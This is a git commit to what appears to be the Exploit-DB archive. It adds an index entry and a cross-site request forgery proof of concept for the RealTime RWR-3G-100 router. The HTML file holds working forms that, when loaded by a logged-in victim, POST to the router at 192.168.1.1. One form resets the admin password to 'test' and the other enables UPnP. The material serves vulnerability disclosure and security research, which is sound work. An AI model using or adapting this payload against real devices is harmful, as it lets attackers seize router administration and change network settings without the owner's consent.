From 26466c9d62afb53135816b0d348351b06bc7a6c3 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 14 Aug 2017 05:01:19 +0000
Subject: [PATCH] DB: 2017-08-14

1 new exploits

RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)
---
 files.csv                             |  1 +
 platforms/hardware/webapps/42449.html | 64 +++++++++++++++++++++++++++
 2 files changed, 65 insertions(+)
 create mode 100755 platforms/hardware/webapps/42449.html
diff --git a/files.csv b/files.csv
index f5397bb58..8822a1c38 100644
--- a/files.csv
+++ b/files.csv
@@ -38250,3 +38250,4 @@ id,file,description,date,author,platform,type,port
 42446,platforms/php/webapps/42446.txt,"DeWorkshop 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42447,platforms/php/webapps/42447.txt,"De-Journal 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
 42448,platforms/php/webapps/42448.txt,"De-Tutor 1.0 - SQL Injection",2017-08-11,"Ihsan Sencan",php,webapps,0
+42449,platforms/hardware/webapps/42449.html,"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)",2017-08-12,"Touhid M.Shaikh",hardware,webapps,0
diff --git a/platforms/hardware/webapps/42449.html b/platforms/hardware/webapps/42449.html
new file mode 100755
index 000000000..3fde64acf
--- /dev/null
+++ b/platforms/hardware/webapps/42449.html
@@ -0,0 +1,64 @@
+<!--
+# Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery
+(Change Admin Password)
+# Date: 13 Aug, 2017
+# Vendor Homepage : http://www.rtsindia.com/
+# Vendor Contact : https://www.linkedin.com/company/realtime-system-ltd.
+# Firmware Version : Ver1.0.56
+# Exploit Author: Touhid M.Shaikh
+# Contact: https://github.com/touhidshaikh
+# Website: http://touhidshaikh.com/
+
+
+===================
+Product Description
+===================
+Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides
+Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB
+Dongle to get connected to Broadband/ Optionally Uses Wired Broadband
+connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and
+Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for
+Multiple Users to get connected to Broadband. Small & Sleek Portable
+Router, Easy to Install & Manage.
+-->
+
+
+
+<!-- CHANGE ADMIN PASSWORD to test-->
+<form action=http://192.168.1.1/goform/formPasswordSetup method=POST
+name="password">
+    <input type="text" name="username" value="admin">
+    <input type="password" name="newpass" value="test">
+    <input type="password" name="confpass" value="test">
+    <input type="hidden" value="/status.asp" name="submit-url">
+    <input type="submit" value="Apply Changes" name="save">
+  <input type="reset" value="  Reset  " name="reset" id="password Reset">
+</form>
+<!-- CHANGE ADMIN PASSWORD Ends here-->
+
+
+<!---Enable The UPNP Service-->
+<form action=http://192.168.1.1/goform/formUpnpSetup method=POST
+name="upnpSetup">
+  <input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes"
+checked>
+  <input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" >
+
+<!--
+  <input type="radio" name="avupnpfunction" id="avupnpfunctiony"
+value="yes" checked>
+  <input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no"
+>
+-->
+  <input type="submit" value="Apply Changes" name="save" id="upnp apply" >
+  <input type="reset" value="  Reset  " name="reset" id="upnp Reset">
+  <input type="hidden" value="/upnp.asp" name="submit-url">
+</form>
+<!---Enable The UPNP Service Ends here-->
+
+
+
+<!--
+======GREEtZ=====
+my cool Broo and Pratik K.tjani
+-->
